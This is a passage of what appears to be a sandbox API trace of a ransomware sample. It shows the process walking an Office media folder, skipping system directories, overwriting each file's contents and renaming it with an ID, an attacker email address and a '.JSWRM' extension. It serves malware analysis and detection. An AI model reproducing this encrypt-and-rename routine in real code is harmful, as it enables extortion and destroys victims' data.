lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.807] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.807] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.807] CloseHandle (hObject=0x238) returned 1 [0135.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0135.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0135.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0135.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0135.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0135.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0135.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.808] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_untag.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_untag.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_untag.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_untag.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0135.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0135.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0135.809] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b1de7ad, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b1de7ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b1de7ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ee14, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_videoadded.wav", cAlternateFileName="LYNC_V~2.WAV")) returned 1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2=".") returned 1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="..") returned 1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="...") returned 1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="windows") returned -1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="recovery") returned -1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="perflogs") returned -1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="documents and settings") returned 1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="system volume information") returned -1 [0135.809] lstrcmpiW (lpString1="LYNC_videoadded.wav", lpString2="msocache") returned -1 [0135.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_videoadded.wav", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0135.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0135.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_videoadded.wav", cchWideChar=19, lpMultiByteStr=0x240f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_videoadded.wav", lpUsedDefaultChar=0x0) returned 19 [0135.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_videoadded.wav", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0135.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0135.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_videoadded.wav", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_videoadded.wav", lpUsedDefaultChar=0x0) returned 19 [0135.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0135.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0135.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0135.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_videoadded.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_videoadded.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.811] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=257556) returned 1 [0135.811] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.811] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.822] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.822] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.823] CloseHandle (hObject=0x238) returned 1 [0135.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0135.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0135.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0135.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0135.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0135.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0135.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_videoadded.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_videoadded.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_videoadded.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_videoadded.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0135.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0135.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0135.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0135.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0135.825] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b1b855a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b1b855a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b1de7ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xafcac, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_videocall.wav", cAlternateFileName="LYNC_V~1.WAV")) returned 1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2=".") returned 1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="..") returned 1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="...") returned 1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="windows") returned -1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="recovery") returned -1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="perflogs") returned -1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="documents and settings") returned 1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="system volume information") returned -1 [0135.825] lstrcmpiW (lpString1="LYNC_videocall.wav", lpString2="msocache") returned -1 [0135.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_videocall.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0135.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_videocall.wav", cchWideChar=18, lpMultiByteStr=0x241308, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_videocall.wav", lpUsedDefaultChar=0x0) returned 18 [0135.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_videocall.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0135.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_videocall.wav", cchWideChar=18, lpMultiByteStr=0x241330, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_videocall.wav", lpUsedDefaultChar=0x0) returned 18 [0135.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0135.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0135.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0135.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_videocall.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_videocall.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.826] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=720044) returned 1 [0135.826] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.826] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.866] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.866] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.867] CloseHandle (hObject=0x238) returned 1 [0135.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0135.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0135.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0135.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0135.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0135.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0135.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.867] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_videocall.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_videocall.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_videocall.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_videocall.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0135.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0135.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0135.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0135.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0135.869] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b1b855a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b1b855a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b1b855a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d84, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PUSH.WAV", cAlternateFileName="")) returned 1 [0135.869] lstrcmpiW (lpString1="PUSH.WAV", lpString2=".") returned 1 [0135.869] lstrcmpiW (lpString1="PUSH.WAV", lpString2="..") returned 1 [0135.869] lstrcmpiW (lpString1="PUSH.WAV", lpString2="...") returned 1 [0135.869] lstrcmpiW (lpString1="PUSH.WAV", lpString2="windows") returned -1 [0135.869] lstrcmpiW (lpString1="PUSH.WAV", lpString2="recovery") returned -1 [0135.869] lstrcmpiW (lpString1="PUSH.WAV", lpString2="perflogs") returned 1 [0135.869] lstrcmpiW (lpString1="PUSH.WAV", lpString2="documents and settings") returned 1 [0135.870] lstrcmpiW (lpString1="PUSH.WAV", lpString2="$RECYCLE.BIN") returned 1 [0135.870] lstrcmpiW (lpString1="PUSH.WAV", lpString2="system volume information") returned -1 [0135.870] lstrcmpiW (lpString1="PUSH.WAV", lpString2="msocache") returned 1 [0135.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0135.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUSH.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUSH.WAV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUSH.WAV", lpUsedDefaultChar=0x0) returned 8 [0135.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0135.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0135.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUSH.WAV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUSH.WAV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUSH.WAV", lpUsedDefaultChar=0x0) returned 8 [0135.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0135.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0135.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0135.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0135.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\PUSH.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\push.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.871] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15748) returned 1 [0135.871] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3d80) returned 0x27b348 [0135.871] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3d80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x3d80, lpOverlapped=0x0) returned 1 [0135.875] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.875] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x3d80, lpOverlapped=0x0) returned 1 [0135.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0135.875] CloseHandle (hObject=0x238) returned 1 [0135.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0135.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, 